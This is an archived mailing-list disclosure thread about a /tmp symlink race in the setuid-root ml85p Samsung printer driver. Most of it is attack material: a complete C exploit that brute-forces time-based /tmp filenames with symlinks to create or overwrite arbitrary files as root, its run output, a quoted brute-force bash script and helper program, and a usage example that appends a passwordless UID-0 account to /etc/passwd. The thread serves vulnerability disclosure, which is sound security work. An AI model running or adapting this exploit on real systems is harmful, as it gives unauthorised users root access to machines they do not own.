Re: ml85p - driver for Samsung ML-85G and /tmp

[Charles Stevenson <core () ezlink com>]

Hey kev...

I downloaded the source for this and have it compiled... 

Check this out

[-(core@devastator:~/bleedingedge)> ./ml85p-xpl /etc/rc.owned by_core
ml85p-xpl.c by core (c) 2001
> backing up /etc/rc.owned to /tmp/ez.TMwyqr
/bin/cp: cannot stat `/etc/rc.owned': No such file or directory
/bin/touch: getting attributes of `/etc/rc.owned': No such file or
directory
> creating a lot of symlinks
Running a few times since I'm lazy.
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
-rw-rw-r--    1 root     staff           0 Jul 10 12:16 /etc/rc.owned
> cleaning up
All done. Enjoy!

Wanna play with it a bit more but we should publish it to bugtraq soon.

/* ml85p-xpl.c
 *
 * Quick hack to exploit ml85p
 *
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 *
 * Example:
 *
 * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
 * $ ./ml85p-xpl /etc/passwd owned::0:0::/root:/bin/bash
 *
 * Then login as owned... etc..
 *
 * by Charles Stevenson <core () ezlink com>
 *
 * July 10 2001
 *
 * shoutz b10z
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#include <time.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 10

void usage(char*);

int main(int argc, char **argv){
   char tempfile[128] = TEMPFILE;
   int fd, i;
   time_t the_time;
   char temp[512];
   
   if (argc < 3){
      usage(argv[0]);
   }

   if((fd = mkstemp(tempfile))==-1){
      fprintf(stderr, "Error creating %s!\n",tempfile);
      exit(1);
   }

   /* begin lazy slacker coding */
   fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
   fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

   /* backup old file */
   sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
   system(temp);
   
   /* set the date/time */
   sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
   system(temp);

   the_time = time(NULL);

   fprintf(stderr, "> creating a lot of symlinks\n");

   for (i=0;i<BRUTE;i++){
      /* BAD CODE: sprintf(gname,"/tmp/ml85g%d",time(0)); */
      sprintf(temp, "/tmp/ml85g%d", the_time+i);
      symlink(argv[1], temp);
   }

   sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s > file; ml85p
-sf file 2>&1>/dev/null & sleep 1; killall ml85p\n", argv[2]);
   fprintf(stderr, "Running a few times since I'm lazy.\n");
   for (i=0;i<BRUTE;i++){
      system(temp);
      //sleep(1);
   }

   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   fprintf(stderr, "> cleaning up\n");
   sprintf(temp, "/bin/rm -f /tmp/ml85*");
   system(temp);
   
   fprintf(stderr, "All done. Enjoy!\n");
   return 0;
}

void usage(char *name){
   
   fprintf(stderr, "usage: %s <filename> <data>\n", name);
   exit(1);
}

/* EOF */

Best Regards,
Charles Stevenson

(b10z ownz :)

> [401070dd] iopl(0x3)                    = 0
> [400cf2bd] time(NULL)                   = 994462668
> [40100cbf] brk(0)                       = 0x8064544
> [40100cbf] brk(0x80646c4)               = 0x80646c4
> [40100cbf] brk(0x8065000)               = 0x8065000
> [400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

I might have to hack the code to get that far since I dont have the
printer.

> I am not sure what other OS's pick for permissions by defualt...
> mandrake seems to not allow user access by default ... I don't know
> what group you need to have access to use this feature.

You can change the umask.
 
> [d0tslash@linux d0tslash]$ /usr/bin/ml85p
> bash: /usr/bin/ml85p: Permission denied
>
> [d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
> -rwsr-x---    1 root     sys         11676 Mar 30 11:43 /usr/bin/ml85p*
>
> for shits and giggles lets see what happens if its got bad perms.
> [root@linux exp]# chmod 4755 /usr/bin/ml85p

If it's installed from the tarball the perms are ok for sploitin'

[-(core@devastator:~/bleedingedge/ml85p-driver)> ls -l `which ml85p`
-r-sr-sr-x    1 root     staff       11196 Jul 10 11:25
/usr/local/bin/ml85p
 
> in which case the results are as follows
>
> [d0tslash@linux d0tslash]$ /usr/bin/ml85p -s (several times)
> -rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463605
> -rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463607
> -rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463608
> -rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463609
>
> [d0tslash@linux d0tslash]$ cat ml85p-exp.c
> // ln -s /etc/oops /tmp/ml85`./ml85p-exp`
>
> #include <time.h>
> #include <stdio.h>
> int main(int argc,char **argv)
> {
> int x = time(NULL);
> x = x + 30;
> printf("%i\n", x);
> }
>
> [d0tslash@linux d0tslash]$ cat ml85p.sh
> #!/bin/bash
> # krfinisterre () checkfree com
> echo "brute.sh <low> <hi>"
> L=$1
> H=$2
> while [ $L -lt $H ]
> do
>         ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
>         let L=L+1
> done
>
> the following file is created.
> -rw-r--r--    1 root     d0tslash        0 Jul  6 20:18 /etc/oops
>
> not sure what use this is short of clobbering files... since the output is sent to this file it may be possible to 
> print
> owned::0:0:root:/root:/bin/bash  to this driver and it may append it to the file in /tmp... I am not sure though... 
> just an idea
> -KF